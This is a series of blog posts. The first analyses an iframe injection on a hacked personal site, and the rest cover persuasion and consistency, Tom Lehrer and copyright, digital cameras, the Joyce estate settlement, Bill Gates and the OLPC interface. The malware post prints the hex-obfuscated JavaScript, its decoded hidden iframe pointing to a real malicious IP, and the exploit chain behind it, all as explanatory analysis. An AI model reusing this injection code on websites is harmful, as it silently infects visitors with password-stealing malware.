The new malware ecology

Posted on by

Ethan Zuckerman has a fascinating story about how contemporary malware works.

It begins with him Googling a friend to find the URL of her home page, only to find that Google wouldn’t connect him to her site and flashed up the warning “This site may harm your computer”. It transpired that this is the result of the StopBadware campaign run by the folks at the Berkman Center; Google identifies sites that it believes are spreading malware and registers them with Stop Badware. If a site has been blacklisted, its owner has the option of proptesting and having his/her case reviewed by the Berkman people. Ethan duly protested on his friend’s behalf…

Within half an hour, three of my colleages pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:

script language=”javascript”> document.write( unescape(
‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E’
) );

That’s some seriously obfuscated Javascript. But if you translate from hexidecimal to ASCII, the code’s pretty clear – it inserts the following code into the top of the HTML page:

< iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter>< /iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page – iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser – the server is apparently refusing connections, at least from my Macintosh – but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters – the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness- associated webpages are in Russian, though their servers are currently in Panama City, Panama – some antispammers believe that RBusiness is short for “Russian Business Network“, which was evidently their previous operating name.

Googling for the specific IP – 81.95.146.98 – turns up a couple of pages with people documenting an interesting exploit – the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install – Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware – Trojan-PSW.Win32.Small.bs – which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So had Ethan’s friend got into bed with these Russian hoodlums? Unlikely.

Simply put, [her site] was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

Which is deeply ironic, given what the StopBadware initiative was set up to do. But in a way, it only goes to underscore how complex and dangerous our software monoculture has become.

The absurdity of consistency

Posted on by

Quentin pointed me to this post in The Dilbert Blog. It reads, in part:

One of the most potent forms of persuasion has to do with people’s innate need to be consistent. Studies show that people will ignore logic and information to be consistent. (In other words, we are moist robots.) According to the research, humans are hardwired for consistency over reason. You already knew that: People don’t switch political parties or religions easily. What you didn’t know is how quickly and easily a manipulator can lock someone into a position.

For example, researchers asked people to write essays in support of a random point of view they did not hold. Months later, when surveyed, the majority held the opinion they wrote about, regardless of the topic. Once a person commits an opinion to writing – even an opinion he does not hold – it soon becomes his actual opinion. Not every time, but MOST of the time. The people in these experiments weren’t exposed to new information before writing their contrived opinions. All they did was sit down and write an opinion they didn’t actually have, and months later it became their actual opinion. The experiment worked whether the volunteers were writing the pro or the con position on the random topic.

Most of the truly stupid things done in this world have to do with this consistency principle. For example, once you define yourself as a loyal citizen of Elbonia, you do whatever the King of Elbonia tells you to do, no matter how stupid that is. And your mind invents reasons as to why dying is a perfectly good life strategy.

Right on. I’ve always thought that consistency is a peurile obsession. Oscar Wilde described it as “the last refuge of the unimaginative”. When Maynard Keynes was once accused (I think by a journalist) of changing his mind, he replied, “When the facts change, I change my mind. What do you do, sir?”

And one of the most nauseating aspects of modern British political journalism is the triumphant cry of “U Turn!” that goes up whenever a politician changes his or her mind. It seems to me that U-turns are a sure sign of a sentient, thinking being.

The Dilbert post attracted many idiotic comments, but one stood out from the crowd. It quoted this paragraph from Ralph Waldo Emerson’s essay on Self reliance:

A foolish consistency is the hobgoblin of little minds, adored by little statesmen and philosophers and divines. With consistency a great soul has simply nothing to do. He may as well concern himself with his shadow on the wall. Speak what you think now in hard words, and to-morrow speak what to-morrow thinks in hard words again, though it contradict every thing you said to-day. — ‘Ah, so you shall be sure to be misunderstood.’ — Is it so bad, then, to be misunderstood? Pythagoras was misunderstood, and Socrates, and Jesus, and Luther, and Copernicus, and Galileo, and Newton, and every pure and wise spirit that ever took flesh. To be great is to be misunderstood.

The very model of a modern creative society? I don’t think so

Posted on by

This morning’s Observer column

[Tom] Lehrer is famous for many things, but chief among them is his famous observation that ‘satire died the day Henry Kissinger was awarded the Nobel Peace Prize’. The song of his that I like most is ‘The Elements Song’, in which he recites the names of all the elements of the periodic table at high speed and without fudging a syllable, while at the same time playing a stirring piano accompaniment of what he described as ‘a barely recognisable tune’. It’s an astonishing performance and it resides happily on my iPod.

The other day, I chanced on a link to a lovely piece of Flash animation (see it for yourself here), in which a chap named Mike Stanfill took the Lehrer soundtrack and visually added the names of the elements in a witty – and technically very demanding – way. My first reaction was pure pleasure. My second thought was that this provides a good object lesson for understanding the current debate about intellectual property in a digital age…

Later… Adam Hodgkin pointed out a lovely Lehrer song about the virtues of plagiarism!

Get Rich Slowly

Posted on by

Why this? Only that I liked the site name — Get Rich Slowly. Beats getpoorquickly anyway. Reminds me of Die Broke, a tome which advises that “the last cheque you write should be to the undertaker — and it should bounce”!

Oh — by the way: the domain getpoorquickly.com is available! Form an orderly queue…

Still movies

Posted on by

Further to my reflections on getting movies from digital still cameras, here’s an example of the way the boundaries between devices is blurring. My Canon IXUS, like many compact digital cameras, has a movie mode. If you use it to record movie clips, then iPhoto neatly collects them and keeps them in its library, where they’re stored as .avi files. Double-click on a movie clip and OS X launches QuickTime player, enabling one to view the clip.

So far so good. But if you launch iMovieHD then you can drag .avi clips from the iPhoto library onto the editing timeline. The software converts them to DV on the fly. (In the old days, you had to open them in QuickTime Pro and convert them to DV files, but now it all seems to be built into iMovieHD.)

I’ve just tested this by making a complete little film from movie clips and images taken using the IXUS in Provence last year. It was as easy as pie. I’d post it to YouTube were it not for the fact that the soundtrack is from a Leo Kottke album and therefore not my property.

I’m sure you can do all this using Windows, but I’ll bet the tools aren’t as integrated as they are on OS X.

I should also add that it was Quentin who, unwittingly, started me off on this line of thought. He too has an IXUS.

Joyce aggression finally halted

Posted on by

Hooray! Stephen Joyce, the maniacal enforcer of the James Joyce estate, has finally met his match. His nemesis: one Lawrence Lessig. Here’s the report from Stanford Law.

Last June we sued the Estate of James Joyce to establish the right of Stanford Professor Carol Shloss to use copyrighted materials in connection with her scholarly biography of Lucia Joyce. Shloss suffered more than ten years of threats and intimidation by Stephen James Joyce, who purported to prohibit her from quoting from anything that James or Lucia Joyce ever wrote for any purpose. As a result of these threats, significant portions of source material were deleted from Shloss’s book, Lucia Joyce: To Dance In The Wake.

In the lawsuits we filed against the Estate and against Stephen Joyce individually, we asked the Court to remove the threat of liability by declaring Shloss’s right to publish those deleted materials on a website designed to supplement the book. After the trying to have the case dismissed for lack of subject matter jurisdiction, the Estate gave up the fight. Joyce and the Estate have now entered into a settlement agreement enforceable by the Court that prohibits them from enforcing any of their copyrights against Shloss in connection with the publication of the supplement, whether in electronic or printed form. (The Settlement Agreement is posted here.)

This is a remarkable victory given the Estate’s past aggression. But more are needed in order to make clear and concrete the protections that Fair Use is intended to protect in theory. We hope this is the first in a string of many cases that vindicate the rights of not only scholars and academics, but creators of all manner.

Official press release here.

Harvard dropout makes good

Posted on by

From MercuryNews.com

CAMBRIDGE, Mass. – Bill Gates is finally getting his Harvard degree — 32 years after he walked away from the university on the path to becoming the world’s wealthiest person.
Gates, billionaire co-founder of Microsoft Corp., philanthropist and college dropout, will receive an honorary degree June 7 when he delivers Harvard University’s 356th commencement address.

“His contributions to the world of business and technology, and the great example he has set through his far-reaching philanthropy, will rightfully put him on center stage in Harvard Yard,” Harvard Alumni Association President Paul Finnegan said in a statement.

Movies without a movie camera

Posted on by

Hmmm… From an Apple QuickTime marketing message:

The pocket-sized, innovative Casio EXILIM HI-ZOOM EX-V7 is currently the world’s slimmest digital camera with a 7X optical zoom lens. More than just a still camera, it also records widescreen, next-generation, high-quality H.264 movies — at remarkably small file sizes — with movie stabilizer technology that minimizes the effects of hand movement while filming. You can record up to three hours of video using a 2GB memory card.

If true, why bother carrying a camcorder? Current price: £279 from here.

OLPC: rethinking the user interface

Posted on by

The folks working on the One Laptop Per Child project have decided that they need to rethink the user interface to take into account the needs of the kids who are its target users. “The desktop metaphor is so entrenched in personal computer users’ collective consciousness”, they write,

that it is easy to forget what a bold and radical innovation the GUI was and how it helped free the computer from the “professionals” who were appalled at the idea of computing for everyone.

OLPC is about to shake up things once more.

Beginning with Papert’s simple observation that children are knowledge workers like any adult, only more so, we decided they needed a user-interface tailored to their specific type of knowledge work: learning. So, working together with teams from Pentagram and Red Hat, we created SUGAR, a “zoom” interface that graphically captures their world of fellow learners and teachers as collaborators, emphasizing the connections within the community, among people, and their activities.

Looking at the design principles underpinning the new interface it’s clear that the team are indeed embarking on a radical re-think. Michael got SUGAR running on Ndiyo terminals (see picture)…

… and although we can’t obviously replicate the mesh-networking facility that’s built into the OLPC laptop, we’ve been able to play with the software. It’s fascinating to be forced to unlearn the desktop metaphor that we’ve all absorbed since the Xerox days.